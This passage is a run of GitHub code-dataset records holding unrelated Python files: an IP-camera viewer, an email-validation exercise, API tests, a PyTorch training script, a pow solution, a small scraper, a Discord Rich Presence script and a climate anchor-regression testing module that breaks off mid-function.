bytes.find('\\xff\\xd8')\n# b = bytes.find('\\xff\\xd9')\n# if a != -1 and b != -1:\n# jpg = bytes[a:b+2]\n# bytes = bytes[b+2:]\n# i = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.CV_LOAD_IMAGE_COLOR)\n# cv2.imshow('i', i)\n# if cv2.waitKey(1) == 27:\n# exit(0) \n\nimport numpy as np\nimport cv2\n\n# Open a sample video available in sample-videos\nvcap = cv2.VideoCapture('http://192.168.100.12:8080/browserfs.html')\n#if not vcap.isOpened():\n# print \"File Cannot be Opened\"\n\nwhile(True):\n # Capture frame-by-frame\n ret, frame = vcap.read()\n #print cap.isOpened(), ret\n if frame is not None:\n # Display the resulting frame\n cv2.imshow('frame',frame)\n # Press q to close the video windows before it ends if you want\n if cv2.waitKey(22) & 0xFF == ord('q'):\n break\n else:\n print (\"Frame is None\")\n break\n\n# When everything done, release the capture\nvcap.release()\ncv2.destroyAllWindows()\nprint (\"Video stop\")","repo_name":"maods2/SGL-System","sub_path":"webcamip.py","file_name":"webcamip.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21928064327","text":"\"\"\"\nValidating Email\nAddresses With a\nFilter\nYou are given an integer followed by email addresses. Your task is to print a list containing only\nvalid email addresses in lexicographical order.\nValid email addresses must follow these rules:\nIt must have the username@websitename.extension format type.\nThe username can only contain letters, digits, dashes and underscores\n.\nThe website name can only have letters and digits .\nThe extension can only contain letters .\nThe maximum length of the extension is .\n\"\"\"\n\n\ndef fun(s):\n # return True if s is a valid email, else return False\n try:\n username, url = s.split(\"@\")\n website, extension = url.split(\".\")\n except ValueError:\n return False\n if username.replace(\"-\", \"\").replace(\"_\", \"\").isalnum() is False:\n return False\n elif website.isalnum() is False:\n return False\n elif extension.isalpha() is False:\n return False\n elif len(extension) > 3:\n return False\n else:\n return True\n\n\ndef filter_mail(x):\n return list(filter(fun, x))\n\n\nn = 3\nemails = [\"lara@hackerrank.com\", \"brian-23@hackerrank.com\", \"britts_54@hackerrank.com\"]\n\nfiltered_emails = filter_mail(emails)\nfiltered_emails.sort()\nprint(filtered_emails)\n","repo_name":"isoldaliborio/challenge_100daysofcode","sub_path":"15_challenge.py","file_name":"15_challenge.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25292476917","text":"import pytest\n\nfrom app.game.answer.models import Answer\nfrom app.game.question.models import Question\n\n\ndef answer2dict(answer: Answer):\n return {\n \"question_id\": answer.question_id,\n \"title\": answer.title,\n \"is_right\": answer.is_right,\n }\n\n\nclass TestAnswerCreateView:\n async def test_success(self, cli, question: Question):\n data = {\"question_id\": question.id, \"title\": \"test\", \"is_right\": False}\n response = await cli.post(\"/answer.create\", json=data)\n assert response.status == 200\n answer = await Answer.query.gino.first()\n assert await response.json() == answer2dict(answer)\n\n\nclass TestAnswerUpdateView:\n async def test_success(self, cli, answer: Answer, question: Question):\n data = {\"id\": answer.id, \"question_id\": question.id, \"title\": \"test1\", \"is_right\": False}\n response = 
await cli.put(\"/answer.update\", json=data)\n assert response.status == 200\n answer = await Answer.get(answer.id)\n assert await response.json() == answer2dict(answer)\n\n async def test_bad_id(self, cli, question: Question):\n data = {\"id\": 0, \"question_id\": question.id, \"title\": \"test1\", \"is_right\": False}\n response = await cli.put(\"/answer.update\", json=data)\n assert response.status == 400\n assert await response.json() == {\"code\": \"no_such_record\"}\n\n\nclass TestAnswerDeleteView:\n async def test_success(self, cli, answer: Answer):\n data = {\"id\": answer.id}\n response = await cli.delete(\"/answer.delete\", json=data)\n assert response.status == 204\n assert await response.json() == None\n\n async def test_bad_id(self, cli):\n data = {\"id\": 999}\n response = await cli.delete(\"/answer.delete\", json=data)\n assert response.status == 400\n assert await response.json() == {\"code\": \"no_such_record\"}\n\n\nclass TestAnswerListView:\n @pytest.mark.parametrize(\n \"params,expected_idxs\",\n [\n [{}, [0, 1]],\n [{\"limit\": 1}, [0]],\n [{\"offset\": 1}, [1]],\n [{\"title\": \"test1\"}, [0]],\n [{\"question_id\": 999}, []],\n ],\n )\n async def test_success(\n self,\n cli,\n answers,\n params: dict,\n expected_idxs,\n ):\n response = await cli.get(\"/answer.list\", params=params)\n assert response.status == 200\n assert await response.json() == [\n answer2dict(answers[idx]) for idx in expected_idxs\n ]\n","repo_name":"d11scord/py_jeopardy_bot","sub_path":"tests/answer/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7454279918","text":"import torch\nfrom torch import nn\nimport torch.optim\nimport torch.utils.data\nfrom models import CNN_with_regressor\nfrom datasets import *\n\ndata_folder = './data'\nout_foler = './trained'\nbatch_size = 32\nepochs = 50\ninitial_lr = 1e-4\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") # sets device for model and PyTorch tensors\nworkers = 1 \n\ndef main():\n \n global BEST_name, lowest_loss, best_epoch\n lowest_loss = float('inf')\n \n print ('Initializing the network settings')\n net = CNN_with_regressor() \n optimizer = torch.optim.Adam(params=net.parameters(), lr=initial_lr) \n net.to(device)\n criterion = nn.SmoothL1Loss().to(device)\n criterion_L1 = nn.L1Loss()\n criterion_L2 = nn.MSELoss()\n criterion_L1 = criterion_L1.to(device)\n criterion_L2 = criterion_L2.to(device)\n\n\n\n\n \n print ('Loading datasets')\n train_loader = torch.utils.data.DataLoader(RegressionDataset(data_folder,'TRAIN',transform=None), \n batch_size=batch_size, shuffle=False, \n num_workers=workers, pin_memory=True)\n \n val_loader = torch.utils.data.DataLoader(RegressionDataset(data_folder,'VAL',transform=None),\n batch_size=batch_size, shuffle=False, \n num_workers=workers, pin_memory=True)\n \n test_loader = torch.utils.data.DataLoader(RegressionDataset(data_folder,'TEST',transform=None),\n batch_size=batch_size, shuffle=False, \n num_workers=workers, pin_memory=True) \n \n print ('Testing with random initialization') \n loss_L1 = validate(test_loader,net,criterion_L1)\n loss_L2 = validate(test_loader,net,criterion_L2) \n print ('Testing L1 loss: %.5f ' % (loss_L1))\n print ('Testing L2 loss: %.5f ' % (loss_L2)) \n \n print ('Start training process...') \n num_params = caculate_param(net)/1000000.\n print ('Total number of params: %2.4f M' % (num_params)) \n for epoch in 
range(1,epochs+1):\n train(train_loader=train_loader,\n network = net, \n criterion=criterion,\n optimizer=optimizer,\n epoch=epoch)\n \n loss = validate(val_loader,net,criterion)\n \n if loss < lowest_loss:\n is_best = True\n lowest_loss = loss\n else:\n is_best = False\n save_checkpoint(epoch,net,is_best)\n # test with the lowest loss model of validation set\n best_checkpoint = torch.load(BEST_name)\n best_network = best_checkpoint['network']\n \n print ('Testing with best checkpoint: epoch %d' % (best_epoch))\n loss_L1 = validate(test_loader,best_network,criterion_L1)\n loss_L2 = validate(test_loader,best_network,criterion_L2) \n print ('Testing L1 loss: %.5f' % (loss_L1))\n print ('Testing L2 loss: %.5f' % (loss_L2))\n \n \ndef train(train_loader,network,criterion,optimizer,epoch,print_period = 1000):\n \"\"\"\n Train model \n\n :param train_loader: training data loader\n :param network: network \n :param criterion: training criterion\n :param optimizer: optimizer\n :param epoch: epoch now\n :param print_period: period for sreen show\n \n \"\"\"\n \n network.train()\n \n for i, (corrs,imgs) in enumerate(train_loader,start = 1):\n imgs = imgs.to(device)\n \n targets = corrs.to(device)\n \n \n pred_corrs = network(imgs)\n \n loss = criterion(pred_corrs,targets)\n \n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n if i % print_period == 0:\n print ('Epoch: %2d/%2d\\t'\n 'Iter: %4d/%4d \\t' \n 'Loss: %.5f' % (epoch,epochs,i,len(train_loader),loss))\n \ndef validate(val_loader,network,criterion):\n \"\"\"\n Evaluate model checkpoint.\n\n :param val_loader: the epoch now\n :param network: network \n :param criterion: evaluation criterion\n return the average loss on validation set\n \"\"\"\n \n network.eval()\n loss_tmp = 0\n with torch.no_grad():\n for i, (corrs,imgs) in enumerate(val_loader):\n imgs = imgs.to(device)\n targets = corrs.to(device)\n \n pred_corrs = network(imgs)\n \n loss = criterion(pred_corrs,targets) \n loss_tmp = loss_tmp + loss.item()\n return loss_tmp/len(val_loader)\n \ndef save_checkpoint(epoch, network,is_best):\n \"\"\"\n Saves model checkpoint.\n\n :param epoch: the epoch now\n :param network: trained_network to be saved\n :param is_best: is this checkpoint the best so far?\n \"\"\"\n global BEST_name,best_epoch\n state = {'epoch': epoch,\n 'network' :network} \n \n \n filename = out_foler+'/checkpoint_epoch_' + str(epoch) + '.pth.tar'\n torch.save(state, filename)\n # If this checkpoint is the best so far, store a copy so it doesn't get overwritten by a worse checkpoint\n if is_best:\n best_epoch = epoch\n BEST_name = out_foler+ '/BEST_checkpoint.pth.tar'\n torch.save(state, BEST_name) \n \ndef caculate_param(network):\n \"\"\"\n Return the total numbers of trainable parameters\n \n :param network: network that is aimed to be caculated\n \"\"\"\n return sum(p.numel() for p in network.parameters() if p.requires_grad)\n \n \nif __name__ == '__main__':\n main()","repo_name":"guantinglin/PicCollage-ML-Quiz","sub_path":"Correlation_estimation/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"27236706648","text":"'''\nImplement pow(x, n), which calculates x raised to the power n (xn).\n\nExample 1:\n\nInput: 2.00000, 10\nOutput: 1024.00000\nExample 2:\n\nInput: 2.10000, 3\nOutput: 9.26100\n\n'''\ndef myPow(x,n):\n if not n:\n return 1\n \n neg = False\n if(n<0):\n n*=-1\n neg = True\n\n res = 1\n while n:\n 
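# Exponentiation by squaring: consume the low bit of n each pass and square x,\n        # so the loop runs O(log n) times rather than O(n).\n        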
if(n%2==1): \n            res *=x\n        x*=x\n        n>>=1\n\n    return 1/res if neg else res\nx=2.00000\nn=10\nprint(myPow(x,n))\n    ","repo_name":"parulsharma-121/CodingQuestions","sub_path":"day_118_powx_n.py","file_name":"day_118_powx_n.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"33431206415","text":"\nimport requests\nfrom bs4 import BeautifulSoup\n\nurl = 'http://www.santostang.com/'\np = requests.get(url)\nprint(p.text)\nsoup = BeautifulSoup(p.text,\"lxml\")\ntitle = soup.find(\"h1\",class_=\"post-title\").a.text.strip()\nprint(title)","repo_name":"leeCoding/Python","sub_path":"Client/RequestTest.py","file_name":"RequestTest.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"47015329764","text":"import time, struct, os, colorama\nimport pypresence\nfrom pypresence import *\n\nclass DiscordRPC:\n    \"\"\" Discord Rich Presence Controller \"\"\"\n\n    def __init__(RPC):\n        # Store every prompt answer on the instance so Start() can read it later.\n        RPC.clientid = input(f'[?] Applications Client ID: ')\n        RPC.rpcstatus = input(f'[?] Applications Status: ')\n        RPC.rpcdetails = input(f'[?] Applications Details: ')\n        RPC.refreshtime = input(f'[?] Applications Refresh Time: ')\n\n        RPC.largeiconname = input(f'[?] Applications Large Icons Name: ')\n        RPC.largeicontext = input(f'[?] Large Icons Text: ')\n        RPC.smalliconname = input(f'[?] Applications Small Icons Name: ')\n        RPC.smallicontext = input(f'[?] Small Icons Text: ')\n\n        RPC.button1text = input(f'[?] 1st Buttons Name: ')\n        RPC.button1link = input(f'[?] 1st Buttons Link: ')\n        RPC.button2text = input(f'[?] 2nd Buttons Name: ')\n        RPC.button2link = input(f'[?] 2nd Buttons Link: ')\n\n    def Menu(RPC):\n        os.system('cls')\n        print(f\"\"\"\n        ██████╗ ██╗ ██████╗ █████╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ █████╗\n        ██╔══██╗██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗ ██╔══██╗██╔══██╗██╔══██╗\n        ██║ ██║██║╚█████╗ ██║ ╚═╝██║ ██║██████╔╝██║ ██║█████╗██████╔╝██████╔╝██║ ╚═╝\n        ██║ ██║██║ ╚═══██╗██║ ██╗██║ ██║██╔══██╗██║ ██║╚════╝██╔══██╗██╔═══╝ ██║ ██╗\n        ██████╔╝██║██████╔╝╚█████╔╝╚█████╔╝██║ ██║██████╔╝ ██║ ██║██║ ╚█████╔╝\n        ╚═════╝ ╚═╝╚═════╝ ╚════╝ ╚════╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═╝╚═╝ ╚════╝ \n        \"\"\")\n\n    def Start(RPC):\n        RPC.Menu()\n        # Use a separate name for the pypresence client so the instance\n        # attributes on RPC stay reachable inside the update loop.\n        presence = Presence(RPC.clientid)\n        presence.connect()\n        starttime = int(time.time())\n\n        try:\n            print(f'[/] Discord-RPC Started Successfully...')\n            while True:\n                presence.update(\n                    state = RPC.rpcdetails,\n                    details = RPC.rpcstatus,\n                    large_image = RPC.largeiconname,\n                    large_text = RPC.largeicontext,\n                    small_image = RPC.smalliconname,\n                    small_text = RPC.smallicontext,\n                    start = starttime,\n                    buttons = [\n                        {\"label\": RPC.button1text, \"url\": RPC.button1link},\n                        {\"label\": RPC.button2text, \"url\": RPC.button2link}\n                    ]\n                )\n                time.sleep(int(RPC.refreshtime))\n        except pypresence.exceptions.InvalidPipe:\n            print(f\"\\n[!] Make sure Discord is Running!\")\n        except pypresence.exceptions.ServerError:\n            print(f\"\\n[!] 
Please make sure you entered the correct Values!\")\n\nRPC = DiscordRPC()\nRPC.Start()\n","repo_name":"5l1v3r1/discordrpc","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16471415351","text":"import numpy as np\nimport pickle\nimport os\nimport sys\nfrom tqdm import tqdm\n\nfrom copy import deepcopy\n\n# from sklearn.preprocessing import StandardScaler\nfrom scipy.stats import spearmanr\n\nfrom robustDA.process_cmip6 import read_files_cmip6, read_forcing_cmip6\nfrom robustDA.processing import split_train_test\nfrom robustDA.anchor_regression import (\n cross_validation_gamma_lambda,\n)\n\n\ndef test_DA(params_climate, params_anchor):\n\n target = params_climate[\"target\"]\n anchor = params_climate[\"anchor\"]\n gamma_vals = params_anchor[\"gamma\"]\n h_anchors = params_anchor[\"h_anchors\"]\n\n B = 50\n cv_vals = 50\n lambda_vals = np.logspace(0, 9, cv_vals)\n grid = (72, 144)\n p = grid[0] * grid[1]\n\n rmse_train_lin = np.zeros([B, len(gamma_vals), cv_vals])\n rmse_PA_train_lin = np.zeros([B, len(gamma_vals), cv_vals])\n corr_train_lin = np.zeros([B, len(gamma_vals), cv_vals])\n mi_train_lin = np.zeros([B, len(gamma_vals), cv_vals])\n\n rmse_test_lin = np.zeros([B, len(gamma_vals), cv_vals])\n rmse_PA_test_lin = np.zeros([B, len(gamma_vals), cv_vals])\n corr_test_lin = np.zeros([B, len(gamma_vals), cv_vals])\n mi_test_lin = np.zeros([B, len(gamma_vals), cv_vals])\n\n coef_raw_opt_lin = np.zeros([B, p])\n coef_raw_opt_ridge_lin = np.zeros([B, p])\n y_test_true = [[] for i in range(B)]\n y_test_pred_lin = [[] for i in range(B)]\n y_test_pred_ridge_lin = [[] for i in range(B)]\n y_anchor_test = [[] for i in range(B)]\n\n ind_gamma_opt_lin = np.zeros([B, 1])\n ind_lambda_opt_lin = np.zeros([B, 1])\n ind_lambda_opt_ridge_lin = np.zeros([B, 1])\n ind_vect_ideal_obj1_lin = np.zeros([B, 2])\n ind_vect_ideal_obj2_lin = np.zeros([B, 2])\n gamma_opt_lin = np.zeros([B, 1])\n lambda_opt_lin = np.zeros([B, 1])\n lambda_opt_ridge_lin = np.zeros([B, 1])\n\n rmse_train_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n rmse_PA_train_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n corr_train_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n corr2_train_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n mi_train_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n\n rmse_test_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n rmse_PA_test_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n corr_test_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n corr2_test_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n mi_test_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n\n coef_raw_opt_nonlin = np.zeros([B, p])\n coef_raw_opt_ridge_nonlin = np.zeros([B, p])\n y_test_pred_nonlin = [[] for i in range(B)]\n y_test_pred_ridge_nonlin = [[] for i in range(B)]\n\n ind_gamma_opt_nonlin = np.zeros([B, 1])\n ind_lambda_opt_nonlin = np.zeros([B, 1])\n ind_lambda_opt_ridge_nonlin = np.zeros([B, 1])\n ind_vect_ideal_obj1_nonlin = np.zeros([B, 2])\n ind_vect_ideal_obj2_nonlin = np.zeros([B, 2])\n gamma_opt_nonlin = np.zeros([B, 1])\n lambda_opt_nonlin = np.zeros([B, 1])\n lambda_opt_ridge_nonlin = np.zeros([B, 1])\n\n modelsDataList, modelsInfoFrame = read_files_cmip6(\n params_climate, norm=True\n )\n\n nbFiles = len(modelsDataList)\n models = sorted(set([modelsDataList[i].model for i in range(nbFiles)]))\n\n alpha_bagging_lin = np.zeros(len(models))\n power_bagging_lin = 
np.zeros(len(models))\n nb_models_bagging = np.zeros(len(models))\n\n alpha_bagging_nonlin = np.zeros(len(models))\n power_bagging_nonlin = np.zeros(len(models))\n\n if len(h_anchors) == 0:\n filename = \"HT_\" + target + \"_\" + anchor + \"_B\" + str(B) + \"_CV3\"\n else:\n filename = (\n \"HT_\"\n + target\n + \"_\"\n + anchor\n + \"_\"\n + \"-\".join(h_anchors)\n + \"_B\"\n + str(B)\n + \"_CV3\"\n + \"_spearman95_coefRaw\"\n )\n\n sys.stdout = open(\"./../output/logFiles/\" + filename + \"_PA.log\", \"w\")\n\n for b in tqdm(range(B)):\n print(\n \"\\n\\n ============== Bag \" + str(b) + \" =================== \\n\",\n flush=True,\n )\n\n dict_models = split_train_test(\n modelsDataList, modelsInfoFrame, target, anchor\n )\n\n (\n rmse_train_bag_lin,\n rmse_PA_train_bag_lin,\n corr_train_bag_lin,\n mi_train_bag_lin,\n coef_raw_bag_opt_lin,\n coef_std_bag_opt_lin,\n coef_raw_bag_opt_ridge_lin,\n coef_std_bag_opt_ridge_lin,\n rmse_test_bag_lin,\n rmse_PA_test_bag_lin,\n corr_test_bag_lin,\n mi_test_bag_lin,\n ind_gamma_bag_opt_lin,\n ind_lambda_bag_opt_lin,\n ind_lambda_bag_opt_ridge_lin,\n ind_vect_ideal_obj1_bag_lin,\n ind_vect_ideal_obj2_bag_lin,\n rmse_train_bag_nonlin,\n rmse_PA_train_bag_nonlin,\n corr_train_bag_nonlin,\n corr2_train_bag_nonlin,\n mi_train_bag_nonlin,\n coef_raw_bag_opt_nonlin,\n coef_std_bag_opt_nonlin,\n coef_raw_bag_opt_ridge_nonlin,\n coef_std_bag_opt_ridge_nonlin,\n rmse_test_bag_nonlin,\n rmse_PA_test_bag_nonlin,\n corr_test_bag_nonlin,\n corr2_test_bag_nonlin,\n mi_test_bag_nonlin,\n ind_gamma_bag_opt_nonlin,\n ind_lambda_bag_opt_nonlin,\n ind_lambda_bag_opt_ridge_nonlin,\n ind_vect_ideal_obj1_bag_nonlin,\n ind_vect_ideal_obj2_bag_nonlin,\n ) = cross_validation_gamma_lambda(\n modelsDataList,\n modelsInfoFrame,\n deepcopy(dict_models),\n params_climate,\n gamma_vals,\n lambda_vals,\n h_anchors,\n display_CV_plot=True,\n )\n\n # sc_y_train = StandardScaler(with_mean=True, with_std=True)\n # y_train_std = sc_y_train.fit_transform(dict_models[\"y_train\"].values)\n\n # sc_X_test = StandardScaler(with_mean=True, with_std=True)\n # X_test_std = sc_X_test.fit_transform(dict_models[\"X_test\"].values)\n\n y_test_true_bag = dict_models[\"y_test\"].values\n\n y_test_true[b].append(y_test_true_bag)\n y_anchor_test[b].append(\n dict_models[\"y_anchor_test\"].values\n ) # do not change the anchor\n\n \"\"\" Linear anchor \"\"\"\n # y_test_pred_std = np.array(\n # np.matmul(X_test_std, np.transpose(coef_std_bag_opt_lin))\n # )\n # y_test_pred_bag = sc_y_train.inverse_transform(y_test_pred_std)\n\n y_test_pred_bag = np.array(\n np.matmul(\n dict_models[\"X_test\"].values,\n np.transpose(coef_raw_bag_opt_lin),\n )\n )\n\n # y_test_pred_std_ridge = np.array(\n # np.matmul(X_test_std, np.transpose(coef_std_bag_opt_ridge_lin))\n # )\n # y_test_pred_bag_ridge = sc_y_train.inverse_transform(y_test_pred_std_ridge)\n\n y_test_pred_bag_ridge = np.array(\n np.matmul(\n dict_models[\"X_test\"].values,\n np.transpose(coef_raw_bag_opt_ridge_lin),\n )\n )\n\n rmse_train_lin[b, :, :] = rmse_train_bag_lin\n rmse_PA_train_lin[b, :, :] = rmse_PA_train_bag_lin\n corr_train_lin[b, :, :] = corr_train_bag_lin\n mi_train_lin[b, :, :] = mi_train_bag_lin\n\n rmse_test_lin[b, :, :] = rmse_test_bag_lin\n rmse_PA_test_lin[b, :, :] = rmse_PA_test_bag_lin\n corr_test_lin[b, :, :] = corr_test_bag_lin\n mi_test_lin[b, :, :] = mi_test_bag_lin\n\n coef_raw_opt_lin[b, :] = coef_raw_bag_opt_lin\n coef_raw_opt_ridge_lin[b, :] = coef_raw_bag_opt_ridge_lin\n\n y_test_pred_lin[b].append(y_test_pred_bag)\n 
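# Keep the plain-ridge predictions alongside the anchor-regression ones;\n        # both are stored per bag and saved for the downstream comparison.\n        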
y_test_pred_ridge_lin[b].append(y_test_pred_bag_ridge)\n\n ind_gamma_opt_lin[b] = ind_gamma_bag_opt_lin\n ind_lambda_opt_lin[b] = ind_lambda_bag_opt_lin\n ind_lambda_opt_ridge_lin[b] = ind_lambda_bag_opt_ridge_lin\n gamma_opt_lin[b] = gamma_vals[ind_gamma_bag_opt_lin]\n lambda_opt_lin[b] = lambda_vals[ind_lambda_bag_opt_lin]\n lambda_opt_ridge_lin[b] = lambda_vals[ind_lambda_bag_opt_ridge_lin]\n\n ind_vect_ideal_obj1_lin[b] = ind_vect_ideal_obj1_bag_lin\n ind_vect_ideal_obj2_lin[b] = ind_vect_ideal_obj2_bag_lin\n\n (\n alpha_per_bag_lin,\n power_per_bag_lin,\n nb_models_per_bag,\n ) = test_DA_per_bag(\n params_climate, models, dict_models, y_test_pred_bag\n )\n\n alpha_bagging_lin = alpha_bagging_lin + alpha_per_bag_lin\n power_bagging_lin = power_bagging_lin + power_per_bag_lin\n nb_models_bagging = nb_models_bagging + nb_models_per_bag\n\n \"\"\" Nonlinear anchor \"\"\"\n # y_test_pred_std = np.array(\n # np.matmul(X_test_std, np.transpose(coef_std_bag_opt_nonlin))\n # )\n # y_test_pred_bag = sc_y_train.inverse_transform(y_test_pred_std)\n\n y_test_pred_bag = np.array(\n np.matmul(\n dict_models[\"X_test\"].values,\n np.transpose(coef_raw_bag_opt_nonlin),\n )\n )\n\n # y_test_pred_std_ridge = np.array(\n # np.matmul(X_test_std, np.transpose(coef_std_bag_opt_ridge_nonlin))\n # )\n # y_test_pred_bag_ridge = sc_y_train.inverse_transform(y_test_pred_std_ridge)\n\n y_test_pred_bag_ridge = np.array(\n np.matmul(\n dict_models[\"X_test\"].values,\n np.transpose(coef_raw_bag_opt_ridge_nonlin),\n )\n )\n\n rmse_train_nonlin[b, :, :] = rmse_train_bag_nonlin\n rmse_PA_train_nonlin[b, :, :] = rmse_PA_train_bag_nonlin\n corr_train_nonlin[b, :, :] = corr_train_bag_nonlin\n corr2_train_nonlin[b, :, :] = corr2_train_bag_nonlin\n mi_train_nonlin[b, :, :] = mi_train_bag_nonlin\n\n rmse_test_nonlin[b, :, :] = rmse_test_bag_nonlin\n rmse_PA_test_nonlin[b, :, :] = rmse_PA_test_bag_nonlin\n corr_test_nonlin[b, :, :] = corr_test_bag_nonlin\n corr2_test_nonlin[b, :, :] = corr2_test_bag_nonlin\n mi_test_nonlin[b, :, :] = mi_test_bag_nonlin\n\n coef_raw_opt_nonlin[b, :] = coef_raw_bag_opt_nonlin\n coef_raw_opt_ridge_nonlin[b, :] = coef_raw_bag_opt_ridge_nonlin\n\n y_test_pred_nonlin[b].append(y_test_pred_bag)\n y_test_pred_ridge_nonlin[b].append(y_test_pred_bag_ridge)\n\n ind_gamma_opt_nonlin[b] = ind_gamma_bag_opt_nonlin\n ind_lambda_opt_nonlin[b] = ind_lambda_bag_opt_nonlin\n ind_lambda_opt_ridge_nonlin[b] = ind_lambda_bag_opt_ridge_nonlin\n gamma_opt_nonlin[b] = gamma_vals[ind_gamma_bag_opt_nonlin]\n lambda_opt_nonlin[b] = lambda_vals[ind_lambda_bag_opt_nonlin]\n lambda_opt_ridge_nonlin[b] = lambda_vals[\n ind_lambda_bag_opt_ridge_nonlin\n ]\n\n ind_vect_ideal_obj1_nonlin[b] = ind_vect_ideal_obj1_bag_nonlin\n ind_vect_ideal_obj2_nonlin[b] = ind_vect_ideal_obj2_bag_nonlin\n\n (\n alpha_per_bag_nonlin,\n power_per_bag_nonlin,\n nb_models_per_bag,\n ) = test_DA_per_bag(\n params_climate, models, dict_models, y_test_pred_bag\n )\n\n alpha_bagging_nonlin = alpha_bagging_nonlin + alpha_per_bag_nonlin\n power_bagging_nonlin = power_bagging_nonlin + power_per_bag_nonlin\n\n alpha_bagging_lin = np.array(\n [\n alpha_bagging_lin[i] / nb_models_bagging[i]\n if nb_models_bagging[i] != 0\n else 0\n for i in range(len(models))\n ]\n )\n power_bagging_lin = np.array(\n [\n power_bagging_lin[i] / nb_models_bagging[i]\n if nb_models_bagging[i] != 0\n else 0\n for i in range(len(models))\n ]\n )\n\n alpha_bagging_nonlin = np.array(\n [\n alpha_bagging_nonlin[i] / nb_models_bagging[i]\n if nb_models_bagging[i] != 0\n else 0\n 
for i in range(len(models))\n ]\n )\n power_bagging_nonlin = np.array(\n [\n power_bagging_nonlin[i] / nb_models_bagging[i]\n if nb_models_bagging[i] != 0\n else 0\n for i in range(len(models))\n ]\n )\n\n dirname = \"./../output/data/\"\n if not os.path.isdir(dirname):\n os.makedirs(dirname)\n\n with open(dirname + filename + \"_valPA.pkl\", \"wb\") as f:\n pickle.dump(\n [\n params_climate,\n params_anchor,\n lambda_vals,\n y_test_true,\n y_anchor_test,\n ind_gamma_opt_lin,\n ind_lambda_opt_lin,\n ind_lambda_opt_ridge_lin,\n gamma_opt_lin,\n lambda_opt_lin,\n lambda_opt_ridge_lin,\n ind_vect_ideal_obj1_lin,\n ind_vect_ideal_obj2_lin,\n coef_raw_opt_lin,\n coef_raw_opt_ridge_lin,\n y_test_pred_lin,\n y_test_pred_ridge_lin,\n rmse_train_lin,\n rmse_PA_train_lin,\n corr_train_lin,\n mi_train_lin,\n rmse_test_lin,\n rmse_PA_test_lin,\n corr_test_lin,\n mi_test_lin,\n alpha_bagging_lin,\n power_bagging_lin,\n ind_gamma_opt_nonlin,\n ind_lambda_opt_nonlin,\n ind_lambda_opt_ridge_nonlin,\n gamma_opt_nonlin,\n lambda_opt_nonlin,\n lambda_opt_ridge_nonlin,\n ind_vect_ideal_obj1_nonlin,\n ind_vect_ideal_obj2_nonlin,\n coef_raw_opt_nonlin,\n coef_raw_opt_ridge_nonlin,\n y_test_pred_nonlin,\n y_test_pred_ridge_nonlin,\n rmse_train_nonlin,\n rmse_PA_train_nonlin,\n corr_train_nonlin,\n corr2_train_nonlin,\n mi_train_nonlin,\n rmse_test_nonlin,\n rmse_PA_test_nonlin,\n corr_test_nonlin,\n corr2_test_nonlin,\n mi_test_nonlin,\n alpha_bagging_nonlin,\n power_bagging_nonlin,\n nb_models_bagging,\n models,\n modelsInfoFrame,\n ],\n f,\n )\n\n sys.stdout.close()\n\n\ndef test_DA_per_bag(params_climate, models, dict_models, y_test_pred):\n target = params_climate[\"target\"]\n start_date = params_climate[\"startDate\"]\n end_date = params_climate[\"endDate\"]\n\n alpha_per_bag = np.zeros(len(models))\n power_per_bag = np.zeros(len(models))\n nb_models_per_bag = np.zeros(len(models))\n\n yf = read_forcing_cmip6(\"historical\", target, start_date, end_date)\n\n nb_years = end_date - start_date + 1\n\n test_models = set(\n [\n dict_models[\"testFiles\"][i].split(\"_\")[2][:3]\n for i in range(len(dict_models[\"testFiles\"]))\n ]\n )\n\n print(test_models, flush=True)\n\n \"\"\" For each model in the test set, build the null from the rest of the models in the test set,\n compute the threshold, then compute \\alpha and \\beta \"\"\"\n for i in range(len(models)):\n if models[i] in test_models:\n ts_null = []\n test_model_files = []\n test_model_ts_vals = []\n\n for j in range(len(dict_models[\"testFiles\"])):\n # ''' Linear correlation (Pearson) '''\n # ts = np.corrcoef(\n # np.transpose(\n # y_test_pred[j * nb_years : (j + 1) * nb_years]\n # ),\n # np.transpose(yf.values.reshape(-1, 1)),\n # )[0, 1]\n\n \"\"\" Rank correlation (Spearman) \"\"\"\n ts = spearmanr(\n y_test_pred[j * nb_years : (j + 1) * nb_years], yf.values\n ).correlation\n\n # ''' First differences -- rank correlation '''\n # diff_pred = np.diff(y_test_pred[j * nb_years : (j + 1) * nb_years])\n # diff_true = yf.diff().values[1:]\n # ts = spearmanr(diff_pred, diff_true).correlation\n\n if dict_models[\"testFiles\"][j].split(\"_\")[2][:3] != models[i]:\n if (\n dict_models[\"testFiles\"][j].split(\"_\")[3]\n == \"piControl\"\n ):\n ts_null.append(ts)\n 